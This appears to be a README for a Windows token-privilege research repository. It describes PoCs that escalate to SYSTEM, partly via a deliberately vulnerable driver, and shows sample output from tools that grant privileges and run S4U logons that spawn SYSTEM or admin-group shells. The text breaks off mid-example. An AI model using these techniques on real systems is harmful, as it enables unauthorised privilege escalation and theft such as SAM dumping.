Kernel mode WinDbg extension and PoCs for testing how token privileges work.
There are notable repositories and articles about token privilege abuse, such as Grzegorz Tworek's Priv2Admin. The code in this repository is intended to help investigate how token privileges work.
Project
This project covers how to get SYSTEM privileges from a high integrity level shell. See its readme.md for details.
Project
The purpose of this project is to investigate how attackers abuse arbitrary kernel write vulnerabilities. All PoCs are written for the HackSys Extreme Vulnerable Driver. Most of these PoCs get SYSTEM integrity level by abusing an arbitrary kernel write vulnerability together with token privileges. They were tested on Windows 10 1809/1903, but in theory they should work on most Windows 10 builds:
| PoC Name | Description |
|---|---|
| CreateAssignTokenVariant | This PoC performs EoP with SeCreateTokenPrivilege and SeAssignPrimaryTokenPrivilege. |
| CreateImpersonateTokenVariant | This PoC performs EoP with SeCreateTokenPrivilege and SeImpersonatePrivilege. |
| CreateTokenVariant | This PoC performs EoP with SeCreateTokenPrivilege. |
| DebugInjectionVariant | This PoC performs EoP with SeDebugPrivilege. It uses code injection into winlogon.exe in the final stage. |
| DebugUpdateProcVariant | This PoC performs EoP with SeDebugPrivilege. It creates a SYSTEM process from winlogon.exe with the UpdateProcThreadAttribute API in the final stage. |
| RestoreServiceModificationVariant | This PoC performs EoP with SeRestorePrivilege. Use HijackShellLib with this PoC. |
| SecondaryLogonVariant | This PoC performs EoP with SeCreateTokenPrivilege and SeImpersonatePrivilege. It uses the Secondary Logon service in the final stage. |
| TakeOwnershipServiceModificationVariant | This PoC performs EoP with SeTakeOwnershipPrivilege. Use HijackShellLib with this PoC. |
| TcbS4UAssignTokenVariant | This PoC performs EoP with SeTcbPrivilege. It gets a SYSTEM mandatory level shell from medium mandatory level. |
| TcbS4UImpersonationVariant | This PoC performs EoP with SeTcbPrivilege. It performs impersonation with S4U logon. It does not get high or SYSTEM integrity level. |
PrivEditor
Warning
In some environments, the debug build does not work. The release build is preferred.
PrivEditor is a kernel mode WinDbg extension to manipulate the token privileges of a specific process. This extension makes it easy to configure the token privileges you want to investigate:

```
0: kd> .load C:\dev\PrivEditor\x64\Release\PrivEditor.dll

PrivEditor - Kernel Mode WinDbg extension for token privilege edit.

Commands :
    + !getps       : List processes in target system.
    + !getpriv     : List privileges of a process.
    + !addpriv     : Add privilege(s) to a process.
    + !rmpriv      : Remove privilege(s) from a process.
    + !enablepriv  : Enable privilege(s) of a process.
    + !disablepriv : Disable privilege(s) of a process.
    + !enableall   : Enable all privileges available to a process.
    + !disableall  : Disable all privileges available to a process.

[*] To see command help, execute "!<Command> help" or "!<Command> /?".
```
This command lists the processes in your target system:

```
0: kd> !getps /?

!getps - List processes in target system.

Usage : !getps [Process Name]

    Process Name : (OPTIONAL) Specifies filter string for process name.
```

If you execute this command without any arguments, it lists all processes in your target system as follows:

```
0: kd> !getps

     PID        nt!_EPROCESS nt!_SEP_TOKEN_PRIVILEGES Process Name
======== =================== ======================== ============
       0 0xfffff805`81233630      0x00000000`00000000 Idle
       4 0xffffd60f`ec068380      0xffffaf00`cec07a40 System
      68 0xffffd60f`f1780480      0xffffaf00`d3b290a0 svchost.exe
      88 0xffffd60f`ec0db080      0xffffaf00`cec0d080 Registry
     324 0xffffd60f`ef342040      0xffffaf00`d0416080 smss.exe
     348 0xffffd60f`f052f100      0xffffaf00`d25d30a0 dwm.exe
     408 0xffffd60f`eca8e140      0xffffaf00`d21bd930 csrss.exe
     480 0xffffd60f`f05a8340      0xffffaf00`d2568670 svchost.exe
     484 0xffffd60f`efcd60c0      0xffffaf00`d06430e0 wininit.exe
     500 0xffffd60f`efd130c0      0xffffaf00`d23100a0 csrss.exe
     580 0xffffd60f`efdc0080      0xffffaf00`d2266630 winlogon.exe

--snip--
```
If you want to find specific processes, set a filter string as follows. The filter works by forward (prefix) matching and is case insensitive:

```
0: kd> !getps micro

     PID        nt!_EPROCESS nt!_SEP_TOKEN_PRIVILEGES Process Name
======== =================== ======================== ============
    4568 0xffffd60f`f14ed080      0xffffaf00`d3db60a0 MicrosoftEdge.exe
    4884 0xffffd60f`f1647080      0xffffaf00`d3fc17b0 MicrosoftEdgeCP.exe
    4892 0xffffd60f`f1685080      0xffffaf00`d3fc07b0 MicrosoftEdgeSH.exe
```
This command lists the token privileges of a specific process:

```
0: kd> !getpriv /?

!getpriv - List privileges of a process.

Usage : !getpriv <PID>

    PID : Specifies target process ID.
```

To use this command, you need to specify the target process ID in decimal format as follows:

```
0: kd> !getpriv 5704

Privilege Name                             State
========================================== ========
SeShutdownPrivilege                        Disabled
SeChangeNotifyPrivilege                    Enabled
SeUndockPrivilege                          Disabled
SeIncreaseWorkingSetPrivilege              Disabled
SeTimeZonePrivilege                        Disabled

[*] PID                      : 5704
[*] Process Name             : cmd.exe
[*] nt!_EPROCESS             : 0xffffd60f`f141e4c0
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a0c0a0
```
This command adds token privilege(s) to a specific process:

```
0: kd> !addpriv /?

!addpriv - Add privilege(s) to a process.

Usage : !addpriv <PID> <Privilege>

    PID       : Specifies target process ID.
    Privilege : Specifies privilege to enable (case insensitive). Available privileges are following.

        + CreateToken                    : SeCreateTokenPrivilege.
        + AssignPrimaryToken             : SeAssignPrimaryTokenPrivilege.
        + LockMemory                     : SeLockMemoryPrivilege.
        + IncreaseQuota                  : SeIncreaseQuotaPrivilege.
        + MachineAccount                 : SeMachineAccountPrivilege.
        + Tcb                            : SeTcbPrivilege.
        + Security                       : SeSecurityPrivilege.
        + TakeOwnership                  : SeTakeOwnershipPrivilege.
        + LoadDriver                     : SeLoadDriverPrivilege.
        + SystemProfile                  : SeSystemProfilePrivilege.
        + Systemtime                     : SeSystemtimePrivilege.
        + ProfileSingleProcess           : SeProfileSingleProcessPrivilege.
        + IncreaseBasePriority           : SeIncreaseBasePriorityPrivilege.
        + CreatePagefile                 : SeCreatePagefilePrivilege.
        + CreatePermanent                : SeCreatePermanentPrivilege.
        + Backup                         : SeBackupPrivilege.
        + Restore                        : SeRestorePrivilege.
        + Shutdown                       : SeShutdownPrivilege.
        + Debug                          : SeDebugPrivilege.
        + Audit                          : SeAuditPrivilege.
        + SystemEnvironment              : SeSystemEnvironmentPrivilege.
        + ChangeNotify                   : SeChangeNotifyPrivilege.
        + RemoteShutdown                 : SeRemoteShutdownPrivilege.
        + Undock                         : SeUndockPrivilege.
        + SyncAgent                      : SeSyncAgentPrivilege.
        + EnableDelegation               : SeEnableDelegationPrivilege.
        + ManageVolume                   : SeManageVolumePrivilege.
        + Impersonate                    : SeImpersonatePrivilege.
        + CreateGlobal                   : SeCreateGlobalPrivilege.
        + TrustedCredManAccess           : SeTrustedCredManAccessPrivilege.
        + Relabel                        : SeRelabelPrivilege.
        + IncreaseWorkingSet             : SeIncreaseWorkingSetPrivilege.
        + TimeZone                       : SeTimeZonePrivilege.
        + CreateSymbolicLink             : SeCreateSymbolicLinkPrivilege.
        + DelegateSessionUserImpersonate : SeDelegateSessionUserImpersonatePrivilege.
        + All                            : All privileges.
```
For example, if you want to add SeDebugPrivilege to a specific process, pass the target process ID as the first argument and the short privilege name listed in the help message (debug) as the second argument, as follows:

```
0: kd> !getpriv 5704

Privilege Name                             State
========================================== ========
SeShutdownPrivilege                        Disabled
SeChangeNotifyPrivilege                    Enabled
SeUndockPrivilege                          Disabled
SeIncreaseWorkingSetPrivilege              Disabled
SeTimeZonePrivilege                        Disabled

[*] PID                      : 5704
[*] Process Name             : cmd.exe
[*] nt!_EPROCESS             : 0xffffd60f`f141e4c0
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a0c0a0

0: kd> !addpriv 5704 debug
[>] Trying to add SeDebugPrivilege.
[*] Done.

0: kd> !getpriv 5704

Privilege Name                             State
========================================== ========
SeShutdownPrivilege                        Disabled
SeDebugPrivilege                           Disabled
SeChangeNotifyPrivilege                    Enabled
SeUndockPrivilege                          Disabled
SeIncreaseWorkingSetPrivilege              Disabled
SeTimeZonePrivilege                        Disabled

[*] PID                      : 5704
[*] Process Name             : cmd.exe
[*] nt!_EPROCESS             : 0xffffd60f`f141e4c0
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a0c0a0
```

The privilege name argument is case insensitive.
If you want to add all token privileges at once, pass all as the privilege name argument:

```
0: kd> !addpriv 5704 all
[>] Trying to add all privileges.
[*] Done.

0: kd> !getpriv 5704

Privilege Name                             State
========================================== ========
SeCreateTokenPrivilege                     Disabled
SeAssignPrimaryTokenPrivilege              Disabled
SeLockMemoryPrivilege                      Disabled
SeIncreaseQuotaPrivilege                   Disabled
SeMachineAccountPrivilege                  Disabled
SeTcbPrivilege                             Disabled
SeSecurityPrivilege                        Disabled

--snip--
```
This command removes token privilege(s) from a specific process:

```
0: kd> !rmpriv /?

!rmpriv - Remove privilege(s) from a process.

Usage : !rmpriv <PID> <Privilege>

    PID       : Specifies target process ID.
    Privilege : Specifies privilege to enable (case insensitive). Available privileges are following.

        + CreateToken                    : SeCreateTokenPrivilege.
        + AssignPrimaryToken             : SeAssignPrimaryTokenPrivilege.
        + LockMemory                     : SeLockMemoryPrivilege.

--snip--
```
If you want to remove SeChangeNotifyPrivilege, execute this command as follows:

```
0: kd> !getpriv 352

Privilege Name                             State
========================================== ========
SeShutdownPrivilege                        Disabled
SeChangeNotifyPrivilege                    Enabled
SeUndockPrivilege                          Disabled
SeIncreaseWorkingSetPrivilege              Disabled
SeTimeZonePrivilege                        Disabled

[*] PID                      : 352
[*] Process Name             : cmd.exe
[*] nt!_EPROCESS             : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d3468770

0: kd> !rmpriv 352 changenotify
[>] Trying to remove SeChangeNotifyPrivilege.
[*] Done.

0: kd> !getpriv 352

Privilege Name                             State
========================================== ========
SeShutdownPrivilege                        Disabled
SeUndockPrivilege                          Disabled
SeIncreaseWorkingSetPrivilege              Disabled
SeTimeZonePrivilege                        Disabled

[*] PID                      : 352
[*] Process Name             : cmd.exe
[*] nt!_EPROCESS             : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d3468770
```
As with the !addpriv command, you can remove all token privileges at once by passing all as the privilege name argument:

```
0: kd> !rmpriv 352 all
[>] Trying to remove all privileges.
[*] Done.

0: kd> !getpriv 352

Privilege Name                             State
========================================== ========

[*] PID                      : 352
[*] Process Name             : cmd.exe
[*] nt!_EPROCESS             : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d3468770
```
This command enables token privilege(s) of a specific process:

```
0: kd> !enablepriv /?

!enablepriv - Enable privilege(s) of a process.

Usage : !enablepriv <PID> <Privilege>

    PID       : Specifies target process ID.
    Privilege : Specifies privilege to enable (case insensitive). Available privileges are following.

        + CreateToken                    : SeCreateTokenPrivilege.
        + AssignPrimaryToken             : SeAssignPrimaryTokenPrivilege.
        + LockMemory                     : SeLockMemoryPrivilege.

--snip--
```
The first argument is the process ID and the second is the token privilege name:

```
0: kd> !getpriv 1932

Privilege Name                             State
========================================== ========
SeShutdownPrivilege                        Disabled
SeChangeNotifyPrivilege                    Enabled
SeUndockPrivilege                          Disabled
SeIncreaseWorkingSetPrivilege              Disabled
SeTimeZonePrivilege                        Disabled

[*] PID                      : 1932
[*] Process Name             : cmd.exe
[*] nt!_EPROCESS             : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a040a0

0: kd> !enablepriv 1932 timezone
[>] Trying to enable SeTimeZonePrivilege.
[*] Done.

0: kd> !getpriv 1932

Privilege Name                             State
========================================== ========
SeShutdownPrivilege                        Disabled
SeChangeNotifyPrivilege                    Enabled
SeUndockPrivilege                          Disabled
SeIncreaseWorkingSetPrivilege              Disabled
SeTimeZonePrivilege                        Enabled

[*] PID                      : 1932
[*] Process Name             : cmd.exe
[*] nt!_EPROCESS             : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a040a0
```
If you try to enable a privilege that has not been added to the token yet, this command adds it automatically before enabling it:

```
0: kd> !getpriv 1932

Privilege Name                             State
========================================== ========
SeShutdownPrivilege                        Disabled
SeChangeNotifyPrivilege                    Enabled
SeUndockPrivilege                          Disabled
SeIncreaseWorkingSetPrivilege              Disabled
SeTimeZonePrivilege                        Enabled

[*] PID                      : 1932
[*] Process Name             : cmd.exe
[*] nt!_EPROCESS             : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a040a0

0: kd> !enablepriv 1932 debug
[*] SeDebugPrivilege is not present.
[>] Trying to add SeDebugPrivilege.
[>] Trying to enable SeDebugPrivilege.
[*] Done.

0: kd> !getpriv 1932

Privilege Name                             State
========================================== ========
SeShutdownPrivilege                        Disabled
SeDebugPrivilege                           Enabled
SeChangeNotifyPrivilege                    Enabled
SeUndockPrivilege                          Disabled
SeIncreaseWorkingSetPrivilege              Disabled
SeTimeZonePrivilege                        Enabled

[*] PID                      : 1932
[*] Process Name             : cmd.exe
[*] nt!_EPROCESS             : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a040a0
```
This command disables token privilege(s) of a specific process:

```
0: kd> !disablepriv /?

!disablepriv - Disable privilege(s) of a process.

Usage : !disablepriv <PID> <Privilege>

    PID       : Specifies target process ID.
    Privilege : Specifies privilege to enable (case insensitive). Available privileges are following.

        + CreateToken                    : SeCreateTokenPrivilege.
        + AssignPrimaryToken             : SeAssignPrimaryTokenPrivilege.
        + LockMemory                     : SeLockMemoryPrivilege.

--snip--
```

To use this command, pass the target process ID as the first argument and the token privilege name as the second argument:

```
0: kd> !getpriv 1932

Privilege Name                             State
========================================== ========
SeShutdownPrivilege                        Disabled
SeDebugPrivilege                           Enabled
SeChangeNotifyPrivilege                    Enabled
SeUndockPrivilege                          Disabled
SeIncreaseWorkingSetPrivilege              Disabled
SeTimeZonePrivilege                        Enabled

[*] PID                      : 1932
[*] Process Name             : cmd.exe
[*] nt!_EPROCESS             : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a040a0

0: kd> !disablepriv 1932 debug
[>] Trying to disable SeDebugPrivilege.
[*] Done.

0: kd> !getpriv 1932

Privilege Name                             State
========================================== ========
SeShutdownPrivilege                        Disabled
SeDebugPrivilege                           Disabled
SeChangeNotifyPrivilege                    Enabled
SeUndockPrivilege                          Disabled
SeIncreaseWorkingSetPrivilege              Disabled
SeTimeZonePrivilege                        Enabled

[*] PID                      : 1932
[*] Process Name             : cmd.exe
[*] nt!_EPROCESS             : 0xffffd60f`f17c6080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffaf00`d4a040a0
```
This command enables all token privileges available to a specific process:

```
0: kd> !enableall /?

!enableall - Enable all privileges available to a process.

Usage : !enableall <PID>

    PID : Specifies target process ID.
```

It works as follows:

```
0: kd> !getpriv 3792

Privilege Name                             State
========================================== ========
SeShutdownPrivilege                        Disabled
SeChangeNotifyPrivilege                    Disabled
SeUndockPrivilege                          Disabled
SeIncreaseWorkingSetPrivilege              Disabled

[*] PID                      : 3792
[*] Process Name             : cmd.exe
[*] nt!_EPROCESS             : 0xffffd507`aaed9080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffb708`d72ab8a0

0: kd> !enableall 3792
[>] Trying to enable all available privileges.
[*] Done.

0: kd> !getpriv 3792

Privilege Name                             State
========================================== ========
SeShutdownPrivilege                        Enabled
SeChangeNotifyPrivilege                    Enabled
SeUndockPrivilege                          Enabled
SeIncreaseWorkingSetPrivilege              Enabled

[*] PID                      : 3792
[*] Process Name             : cmd.exe
[*] nt!_EPROCESS             : 0xffffd507`aaed9080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffb708`d72ab8a0
```
This command disables all token privileges of a specific process:

```
0: kd> !disableall /?

!disableall - Disable all privileges available to a process.

Usage : !disableall <PID>

    PID : Specifies target process ID.
```

This command is equivalent to !disablepriv <PID> all. It works as follows:

```
0: kd> !getpriv 3792

Privilege Name                             State
========================================== ========
SeShutdownPrivilege                        Enabled
SeChangeNotifyPrivilege                    Enabled
SeUndockPrivilege                          Enabled
SeIncreaseWorkingSetPrivilege              Enabled

[*] PID                      : 3792
[*] Process Name             : cmd.exe
[*] nt!_EPROCESS             : 0xffffd507`aaed9080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffb708`d72ab8a0

0: kd> !disableall 3792
[>] Trying to disable all available privileges.
[*] Done.

0: kd> !getpriv 3792

Privilege Name                             State
========================================== ========
SeShutdownPrivilege                        Disabled
SeChangeNotifyPrivilege                    Disabled
SeUndockPrivilege                          Disabled
SeIncreaseWorkingSetPrivilege              Disabled

[*] PID                      : 3792
[*] Process Name             : cmd.exe
[*] nt!_EPROCESS             : 0xffffd507`aaed9080
[*] nt!_SEP_TOKEN_PRIVILEGES : 0xffffb708`d72ab8a0
```
Project
This project contains PoCs for sensitive token privileges such as SeDebugPrivilege. Currently, PoCs for only some of them have been released.
| Program Name | Description |
|---|---|
| SeAuditPrivilegePoC | This PoC tries to generate new security event(s) with SeAuditPrivilege. SeAuditPrivilege does not require high integrity level, but this PoC requires administrative privileges on its first execution to install a new event source. In addition, to confirm the result, this PoC may require modifying the Local Security Policy settings. |
| SeBackupPrivilegePoC | This PoC tries to dump HKLM\SAM with SeBackupPrivilege. |
| SeCreatePagefilePrivilegePoC | This PoC tries to set the PageFile option to specific values with SeCreatePagefilePrivilege. |
| SeCreateTokenPrivilegePoC | This PoC tries to create an elevated token with SeCreateTokenPrivilege. |
| SeDebugPrivilegePoC | This PoC tries to open a handle to winlogon.exe with SeDebugPrivilege. |
| SeRestorePrivilegePoC | This PoC tries to write a test file into C:\Windows\System32 with SeRestorePrivilege. |
| SeSecurityPrivilegePoC | This PoC tries to read the latest security event with SeSecurityPrivilege. |
| SeShutdownPrivilegePoC | This PoC tries to cause a BSOD with SeShutdownPrivilege. |
| SeSystemEnvironmentPrivilegePoC | This PoC tries to enumerate the system environment with SeSystemEnvironmentPrivilege. It works for UEFI based systems only. Due to OS functionality, this PoC does not work on OSes earlier than Windows 10 Build 1809. |
| SeTakeOwnershipPrivilegePoC | This PoC tries to change the owner of HKLM:\SYSTEM\CurrentControlSet\Services\dmwappushservice to the caller's user account with SeTakeOwnershipPrivilege. |
| SeTcbPrivilegePoC | This PoC tries to perform S4U logon to become BUILTIN\Backup Operators with SeTcbPrivilege. |
| SeTrustedCredManAccessPrivilegePoC | This PoC tries to access a DPAPI blob with SeTrustedCredManAccessPrivilege. |
S4uDelegator
This tool performs S4U logon with SeTcbPrivilege. To perform S4U logon with this tool, administrative privileges are required.

```
PS C:\Tools> .\S4uDelegator.exe -h

S4uDelegator - Tool for S4U Logon.

Usage: S4uDelegator.exe [Options]

    -h, --help    : Displays this help message.
    -l, --lookup  : Flag to lookup account SID.
    -x, --execute : Flag to execute command.
    -c, --command : Specifies command to execute. Default is cmd.exe.
    -d, --domain  : Specifies domain name to lookup or S4U logon.
    -e, --extra   : Specifies group SIDs you want to add for S4U logon with comma separation.
    -n, --name    : Specifies account name to lookup or S4U logon.
    -s, --sid     : Specifies SID to lookup.
```
To use this tool, either the -l or the -x flag must be specified. The -l flag looks up account information as follows:

```
PS C:\Tools> .\S4uDelegator.exe -l -d contoso -n "domain admins"

[*] Account Name : CONTOSO\Domain Admins
[*] SID          : S-1-5-21-3654360273-254804765-2004310818-512
[*] Account Type : Group

PS C:\Tools> .\S4uDelegator.exe -l -s S-1-5-80-1913148863-3492339771-4165695881-2087618961-4109116736

[*] Account Name : NT SERVICE\WinDefend
[*] SID          : S-1-5-80-1913148863-3492339771-4165695881-2087618961-4109116736
[*] Account Type : WellKnownGroup
```
To execute a command with S4U logon, set the -x flag and specify the account name or SID as follows. The command to execute can be specified with the -c option (the default is cmd.exe):

```
PS C:\Tools> whoami /user

USER INFORMATION
----------------

User Name    SID
============ =============================================
contoso\jeff S-1-5-21-3654360273-254804765-2004310818-1105

PS C:\Tools> .\S4uDelegator.exe -x -d . -n admin

[*] S4U logon target information:
    [*] Account : CL01\admin
    [*] SID     : S-1-5-21-2659926013-4203293582-4033841475-500
    [*] UPN     : (Null)
    [*] Type    : User
[>] Trying to get SYSTEM.
[+] Got SYSTEM privileges.
[>] Trying to S4U logon.
[+] S4U logon is successful.
[>] Trying to create a token assigned process.

Microsoft Windows [Version 10.0.18362.175]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Tools>whoami /user

USER INFORMATION
----------------

User Name  SID
========== =============================================
cl01\admin S-1-5-21-2659926013-4203293582-4033841475-500
```
If you want to add extra group information, pass the group SIDs as a comma-separated value with the -e option as follows:

```
PS C:\Tools> whoami /user

USER INFORMATION
----------------

User Name     SID
============= =============================================
contoso\david S-1-5-21-3654360273-254804765-2004310818-1104

PS C:\Tools> .\S4uDelegator.exe -x -d contoso -n jeff -e S-1-5-32-544,S-1-5-20 -c powershell

[*] S4U logon target information:
    [*] Account : CONTOSO\jeff
    [*] SID     : S-1-5-21-3654360273-254804765-2004310818-1105
    [*] UPN     : [email protected]
    [*] Type    : User
[>] Verifying extra group SID(s).
    [*] BUILTIN\Administrators (SID : S-1-5-32-544) will be added as a group.
    [*] NT AUTHORITY\NETWORK SERVICE (SID : S-1-5-20) will be added as a group.
[>] Trying to get SYSTEM.
[+] Got SYSTEM privileges.
[>] Trying to S4U logon.
[+] S4U logon is successful.
[>] Trying to create a token assigned process.
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\Tools> whoami /user

USER INFORMATION
----------------

User Name    SID
============ =============================================
contoso\jeff S-1-5-21-3654360273-254804765-2004310818-1105

PS C:\Tools> whoami /groups

GROUP INFORMATION
-----------------

Group Name                             Type             SID                                           Attributes
====================================== ================ ============================================= ==================================================
Everyone                               Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                          Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                   Well-known group S-1-5-2                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization         Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators                 Alias            S-1-5-32-544                                  Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK SERVICE           Well-known group S-1-5-20                                      Mandatory group, Enabled by default, Enabled group
CONTOSO\ServerAdmins                   Group            S-1-5-21-3654360273-254804765-2004310818-1103 Mandatory group, Enabled by default, Enabled group
Service asserted identity              Well-known group S-1-18-2                                      Mandatory group, Enabled by default, Enabled group
Mandatory Label\System Mandatory Level Label            S-1-16-16384
```
Warning
If you try S4U logon with an account that is not defined on the target machine, you will get error 0xC0000142 (STATUS_DLL_INIT_FAILED) and the command cannot be executed. To avoid this problem, add privileged groups as extra groups with the -e option. In addition, some accounts (e.g. NT SERVICE\TrustedInstaller) cannot be specified as an extra group for S4U logon. If you set such group accounts as an extra group, S4U logon will fail with error 0x00000005 (ERROR_ACCESS_DENIED).
SwitchPriv
This tool enables or disables specific token privileges of a process:

```
PS C:\Dev> .\SwitchPriv.exe -h

SwitchPriv - Tool to control token privileges.

Usage: SwitchPriv.exe [Options]

    -h, --help      : Displays this help message.
    -d, --disable   : Specifies token privilege to disable or "all".
    -e, --enable    : Specifies token privilege to enable or "all".
    -f, --filter    : Specifies token privilege you want to remain.
    -i, --integrity : Specifies integrity level to set in decimal value.
    -p, --pid       : Specifies the target PID. Default specifies PPID.
    -r, --remove    : Specifies token privilege to remove or "all".
    -s, --search    : Specifies token privilege to search.
    -g, --get       : Flag to get available privileges for the target process.
    -l, --list      : Flag to list values for --integrity options.
    -S, --system    : Flag to run as "NT AUTHORITY\SYSTEM".
```
To list the values for the --integrity option, execute with the --list flag as follows:

```
PS C:\Dev> .\SwitchPriv.exe -l

Available values for --integrity option:

    * 0 : UNTRUSTED_MANDATORY_LEVEL
    * 1 : LOW_MANDATORY_LEVEL
    * 2 : MEDIUM_MANDATORY_LEVEL
    * 3 : MEDIUM_PLUS_MANDATORY_LEVEL
    * 4 : HIGH_MANDATORY_LEVEL
    * 5 : SYSTEM_MANDATORY_LEVEL
    * 6 : PROTECTED_MANDATORY_LEVEL
    * 7 : SECURE_MANDATORY_LEVEL

Example :

    * Down a specific process' integrity level to Low.

        PS C:\> .\SwitchPriv.exe -p 4142 -s 1

Protected and Secure level should not be available, but left for research purpose.
```
The target process PID is specified with the -p option. You can list the privileges available to the target process with the -g flag and the -p option as follows:

```
PS C:\Dev> .\SwitchPriv.exe -p 9408 -g

[>] Trying to get available token privilege(s) for the target process.
    [*] Target PID   : 9408
    [*] Process Name : Notepad
[+] Got 5 token privilege(s).

PRIVILEGES INFORMATION
----------------------

Privilege Name                State
============================= =========================
SeShutdownPrivilege           Disabled
SeChangeNotifyPrivilege       EnabledByDefault, Enabled
SeUndockPrivilege             Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege           Disabled

[*] Integrity Level : Medium Mandatory Level
[*] Done.
```
When the -p option is not specified, the target PID is the parent PID of this tool:

```
PS C:\Dev> .\SwitchPriv.exe -g

[>] Trying to get available token privilege(s) for the target process.
    [*] Target PID   : 6772
    [*] Process Name : powershell
[+] Got 5 token privilege(s).

PRIVILEGES INFORMATION
----------------------

Privilege Name                State
============================= =========================
SeShutdownPrivilege           Disabled
SeChangeNotifyPrivilege       EnabledByDefault, Enabled
SeUndockPrivilege             Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege           Disabled

[*] Integrity Level : Medium Mandatory Level
[*] Done.
```
The privilege to control is specified by a case-insensitive string that must identify a unique privilege name among the privileges available to the target process. For example, to enable SeUndockPrivilege for the target process, execute with the --enable option as follows:

```
PS C:\Dev> .\SwitchPriv.exe -p 9408 -g

[>] Trying to get available token privilege(s) for the target process.
    [*] Target PID   : 9408
    [*] Process Name : Notepad
[+] Got 5 token privilege(s).

PRIVILEGES INFORMATION
----------------------

Privilege Name                State
============================= =========================
SeShutdownPrivilege           Disabled
SeChangeNotifyPrivilege       EnabledByDefault, Enabled
SeUndockPrivilege             Disabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege           Disabled

[*] Integrity Level : Medium Mandatory Level
[*] Done.

PS C:\Dev> .\SwitchPriv.exe -p 9408 -e und

[>] Trying to enable a token privilege.
    [*] Target PID   : 9408
    [*] Process Name : Notepad
[+] SeUndockPrivilege is enabled successfully.
[*] Done.

PS C:\Dev> .\SwitchPriv.exe -p 9408 -g

[>] Trying to get available token privilege(s) for the target process.
    [*] Target PID   : 9408
    [*] Process Name : Notepad
[+] Got 5 token privilege(s).

PRIVILEGES INFORMATION
----------------------

Privilege Name                State
============================= =========================
SeShutdownPrivilege           Disabled
SeChangeNotifyPrivilege       EnabledByDefault, Enabled
SeUndockPrivilege             Enabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege           Disabled

[*] Integrity Level : Medium Mandatory Level
[*] Done.
```
When you pass an ambiguous string that cannot identify a unique privilege name, you will get the following message:

```
PS C:\Dev> .\SwitchPriv.exe -p 9408 -e se

[>] Trying to enable a token privilege.
    [*] Target PID   : 9408
    [*] Process Name : Notepad
[-] Cannot specify a unique privilege to enable.
    [*] SeShutdownPrivilege
    [*] SeChangeNotifyPrivilege
    [*] SeUndockPrivilege
    [*] SeIncreaseWorkingSetPrivilege
    [*] SeTimeZonePrivilege
[*] Done.
```
For example, to disable SeChangeNotifyPrivilege, execute with the --disable option as follows:

```
PS C:\Dev> .\SwitchPriv.exe -p 9408 -g

[>] Trying to get available token privilege(s) for the target process.
    [*] Target PID   : 9408
    [*] Process Name : Notepad
[+] Got 5 token privilege(s).

PRIVILEGES INFORMATION
----------------------

Privilege Name                State
============================= =========================
SeShutdownPrivilege           Disabled
SeChangeNotifyPrivilege       EnabledByDefault, Enabled
SeUndockPrivilege             Enabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege           Disabled

[*] Integrity Level : Medium Mandatory Level
[*] Done.

PS C:\Dev> .\SwitchPriv.exe -p 9408 -d chan

[>] Trying to disable a token privilege.
    [*] Target PID   : 9408
    [*] Process Name : Notepad
[+] SeChangeNotifyPrivilege is disabled successfully.
[*] Done.

PS C:\Dev> .\SwitchPriv.exe -p 9408 -g

[>] Trying to get available token privilege(s) for the target process.
    [*] Target PID   : 9408
    [*] Process Name : Notepad
[+] Got 5 token privilege(s).

PRIVILEGES INFORMATION
----------------------

Privilege Name                State
============================= ==========================
SeShutdownPrivilege           Disabled
SeChangeNotifyPrivilege       EnabledByDefault, Disabled
SeUndockPrivilege             Enabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege           Disabled

[*] Integrity Level : Medium Mandatory Level
[*] Done.
```
To remove a privilege, use the --remove option as follows:

```
PS C:\Dev> .\SwitchPriv.exe -p 9408 -g

[>] Trying to get available token privilege(s) for the target process.
    [*] Target PID   : 9408
    [*] Process Name : Notepad
[+] Got 5 token privilege(s).

PRIVILEGES INFORMATION
----------------------

Privilege Name                State
============================= ==========================
SeShutdownPrivilege           Disabled
SeChangeNotifyPrivilege       EnabledByDefault, Disabled
SeUndockPrivilege             Enabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege           Disabled

[*] Integrity Level : Medium Mandatory Level
[*] Done.

PS C:\Dev> .\SwitchPriv.exe -p 9408 -r inc

[>] Trying to remove a token privilege.
    [*] Target PID   : 9408
    [*] Process Name : Notepad
